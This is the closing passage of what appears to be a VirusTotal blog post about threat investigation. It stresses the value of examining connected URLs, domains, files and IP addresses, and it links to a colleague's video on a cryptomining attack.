Very often during an investigation, you might not have enough context about an individual threat, and so being able to look at the connected URLs, domains, files, IP addresses, etc. becomes crucial in understanding what is going on. My colleague Evan explains this far better than I can do in just a couple of paragraphs, so make sure you check out his video dissecting a cryptomining attack at https://www.virustotal.com/learn/watch/.

Wrapping up, don’t think of this as just new functionality to dissect individual threats. All of this data contributes to the bigger picture and increases the power of our telescope lens that sheds light into malicious behaviors on the Internet.